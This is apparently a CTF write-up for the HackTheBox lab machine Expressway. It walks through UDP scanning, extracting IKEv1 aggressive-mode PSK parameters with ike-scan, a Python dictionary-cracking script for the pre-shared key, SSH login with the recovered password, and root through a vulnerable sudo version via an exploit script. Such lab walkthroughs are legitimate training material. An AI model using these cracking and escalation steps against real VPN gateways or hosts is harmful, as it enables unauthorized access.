Havoc Hacking Articles

HackTheBox Expressway

⚡ Walkthrough⚡

Sep 21, 2025 - 4 minute read

HackTheBox Expressway Walkthrough

This was an easy Linux machine and the first machine of Season 9. This is how I pwned it. Let's go.

Initial Enumeration

Add <target_ip> expressway.htb to your /etc/hosts for easy access and a clean walkthrough.

Tip for beginners: editing /etc/hosts gives you a human-readable hostname instead of typing IPs every time. On Linux edit with sudo nano /etc/hosts (or your editor), add a line like:

10.10.10.10 expressway.htb

Save and then you can ping expressway.htb or ssh ike@expressway.htb instead of using the IP.

First, as usual, we run nmap. The interesting thing this time was that on TCP only port 22 (SSH) was open, but looking further at the UDP results I saw port 500 open, running ISAKMP.

Quick nmap reminder for beginners: a useful starting command for a full TCP port scan with script and version detection is:

 sudo nmap -sC -sV -p- --min-rate 1000 <target>

Nmap TCP Scan Results

But note: UDP scanning is slower and needs the explicit -sU flag. On this box the important result was UDP/500 open, which is ISAKMP (the IKE key-exchange protocol used by IPsec VPNs).

Nmap UDP Scan Results

Foothold and user.txt

So ISAKMP is the VPN key-exchange service (IKE) listening on UDP port 500.
To enumerate it further we will use a tool called ike-scan.

What is ike-scan?
ike-scan is a tool that probes IKE (Internet Key Exchange) services and can reveal protocol details (accepted transforms, vendor IDs) and identities. When the server accepts aggressive mode with pre-shared-key authentication, its reply also contains every value needed to check PSK guesses offline. Aggressive mode is noisier than main mode but leaks more: the identity is sent in the clear, and with PSK auth the responder hash depends only on public values plus the key.

  • Running the scan in aggressive mode gives us two very important pieces of information.
  • The first is the authentication method, which is PSK (Pre-Shared Key); the second is an identity, which is our way to a foothold: ike@expressway.htb.
  • To get the PSK cracking parameters from the server we use the command below (-A selects aggressive mode, -P prints the parameters in the format psk-crack expects; the target's IP goes here, not your own):
sudo ike-scan -A -P <TARGET_IP>

IKE Scan Aggressive Mode

  • Save this parameter line to a file called psk.txt (the -P flag also accepts a filename directly, e.g. -Ppsk.txt). The -P flag makes ike-scan print the aggressive-mode parameters needed for offline PSK cracking.

  • The long colon-separated line has nine hex fields: the responder's and initiator's DH public values, both cookies, the SA payload, the responder ID, both nonces and, last, the responder hash (HASH_R). That final field is what we crack offline against a wordlist, with psk-crack (shipped with ike-scan) or hashcat; every other input to the hash was sent in the clear, so only the pre-shared key is unknown.

  • Cracking it gives us the password freakingrockstarontheroad

  • This password works for SSH as ike@expressway.htb

Password Cracking Results
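To show why the aggressive-mode reply is crackable at all, here is an added example (not from the original post or from ike-scan itself) that re-implements the check psk-crack performs: SKEYID = prf(psk, Ni_b | Nr_b) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b) from RFC 2409, with the PRF chosen by hash length exactly as psk-crack does (16 bytes MD5, 20 bytes SHA1). All exchange values are constructed sample data, not a capture from the box; the DH values are short stand-ins for the real 128-byte group 2 values, and the helper names (ike_hash_r, crack_psk, make_sample_line) are mine.

```python
"""IKEv1 aggressive-mode PSK recovery, the way psk-crack / hashcat 5400 do it.

RFC 2409, pre-shared-key authentication:
    SKEYID = prf(psk, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
In aggressive mode everything except the psk crosses the wire in the clear,
so the responder's HASH_R can be checked against a wordlist offline.
"""
import hmac

# psk-crack / ike-scan -P file format: nine colon-separated hex fields, in this order.
FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")


def ike_hash_r(psk: bytes, p: dict, hash_name: str) -> bytes:
    """Compute HASH_R from the cleartext exchange values and a candidate PSK."""
    def prf(key: bytes, data: bytes) -> bytes:
        return hmac.new(key, data, hash_name).digest()
    skeyid = prf(psk, p["ni_b"] + p["nr_b"])
    return prf(skeyid, p["g_xr"] + p["g_xi"] + p["cky_r"] + p["cky_i"] + p["sai_b"] + p["idir_b"])


def parse_psk_line(line: str) -> dict:
    """Parse one ike-scan -P output line into raw byte fields."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return {name: bytes.fromhex(val) for name, val in zip(FIELDS, parts)}


def prf_for(hash_r: bytes) -> str:
    """psk-crack infers the PRF from the hash length: 16 bytes -> MD5, 20 bytes -> SHA1."""
    try:
        return {16: "md5", 20: "sha1"}[len(hash_r)]
    except KeyError:
        raise ValueError(f"unsupported HASH_R length {len(hash_r)}") from None


def crack_psk(line: str, wordlist):
    """Return the first candidate that reproduces HASH_R, or None if the wordlist misses."""
    p = parse_psk_line(line)
    hash_name = prf_for(p["hash_r"])
    for cand in wordlist:
        if hmac.compare_digest(ike_hash_r(cand.encode(), p, hash_name), p["hash_r"]):
            return cand
    return None


def make_sample_line(psk: str, hash_name: str = "sha1") -> str:
    """Build a constructed ike-scan -P style line for a known PSK (sample data only).

    Real g^x values are 128-byte DH group 2 public values; the short stand-ins
    here keep the line readable, the hash computation is identical.
    """
    p = {
        "g_xr": bytes.fromhex("a1b2c3d4" * 4),
        "g_xi": bytes.fromhex("1a2b3c4d" * 4),
        "cky_r": bytes.fromhex("0011223344556677"),
        "cky_i": bytes.fromhex("8899aabbccddeeff"),
        # SA payload body as the initiator proposed it: 3DES / SHA1 / PSK / DH group 2 (constructed)
        "sai_b": bytes.fromhex(
            "00000001000000010000002801010001000000200101000080010005800200028003000180040002"
        ),
        # ID payload body: type 3 (ID_USER_FQDN), protocol 0, port 0, then the identity
        # the responder leaks in aggressive mode
        "idir_b": bytes([3, 0, 0, 0]) + b"ike@expressway.htb",
        "ni_b": bytes.fromhex("deadbeef" * 5),
        "nr_b": bytes.fromhex("cafebabe" * 5),
    }
    p["hash_r"] = ike_hash_r(psk.encode(), p, hash_name)
    return ":".join(p[name].hex() for name in FIELDS)


if __name__ == "__main__":
    line = make_sample_line("freakingrockstarontheroad")
    words = ["password", "letmein", "freakingrockstarontheroad", "Welcome1"]
    print("HASH_R field:", line.rsplit(":", 1)[1])
    print("recovered PSK:", crack_psk(line, words))
```

The loop is the whole attack: one HMAC per guess, no interaction with the server after the single aggressive-mode exchange, which is why a dictionary password on an IKEv1 PSK VPN is gone the moment the responder answers an aggressive-mode probe. A real psk.txt from ike-scan drops straight into crack_psk together with a wordlist such as rockyou.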

How to use it (simple SSH example for beginners):

ssh ike@expressway.htb
Password: freakingrockstarontheroad

If the login is refused, check that password authentication is allowed on the server (this box accepts passwords; if only key authentication were enabled you would need a key instead). If you get Permission denied, double-check the username, the hosts entry, and that the service is still up.

SSH Login Success

  • This was our foothold and our way to user.txt.

User Flag

Privilege Escalation and root.txt

  • The privilege escalation for this machine was very simple: we just need to exploit a vulnerable sudo version.
  • Check the sudo version with the following command:

sudo -V

That prints detailed sudo info; the first line shows the version (for example, Sudo version 1.9.17). You can also run:

sudo --version

If you can run sudo -l as the user, that also shows which commands (if any) the user may run as root and whether a password is required.

Sudo Version Check

Safety & ethics note for beginners: downloading and running exploit code can be dangerous on your own machine. Run exploits only in an isolated environment (e.g., a lab VM) and read the script before running it. On HTB boxes, using published exploits for learning is normal, but still inspect and understand each step.

  • To exploit it, create a file in /tmp with the contents of priv_esc.sh from the GitHub repo and give it execute permissions.

Steps (example; review the exploit file before you run it):

# from the box (as the low-priv user)
cd /tmp
# create the file and paste the exploit content you reviewed
nano priv_esc.sh
# make it executable
chmod +x priv_esc.sh

How to run it: follow the repository instructions. Typically the exploit is either run directly or needs sudo invoked in a specific way to reach the vulnerable code path. For example (pseudo):

sudo /path/to/vulnerable/command /tmp/priv_esc.sh

Do not run an exploit blindly: read the README in the repo and confirm the usage. On this machine the repo contained tested instructions which, when followed, gave us a root shell.

Privilege Escalation Success

  • Finally we became root and got root.txt

Thanks for reading the walkthrough. Hope you liked it! Happy hacking.